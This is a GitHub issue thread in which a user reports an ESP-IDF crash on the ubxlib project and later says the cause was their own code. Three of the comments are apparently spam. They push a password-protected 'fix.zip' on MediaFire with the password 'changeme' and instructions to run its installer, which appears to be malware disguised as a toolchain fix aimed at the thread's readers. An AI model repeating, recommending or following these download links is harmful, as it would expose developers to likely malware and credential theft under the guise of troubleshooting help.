### ISSUE TITLE
Guru Meditation Error

### ISSUE THREAD

**Issue by alexmaron81** [u-blox/ubxlib#275]
Hi Rob, I recently got the following error.

I am using the latest ESP-IDF 3.5, could this have something to do with it?

![image](https://github.com/user-attachments/assets/870cdfc4-5bd0-4a46-bb88-9d63c4f59fd8)

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alexmaron81** [comment]
What is it?

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alexmaron81** [comment]
I have solved the problem. It was due to the wrong up in my code.
You can delete the topic completely.
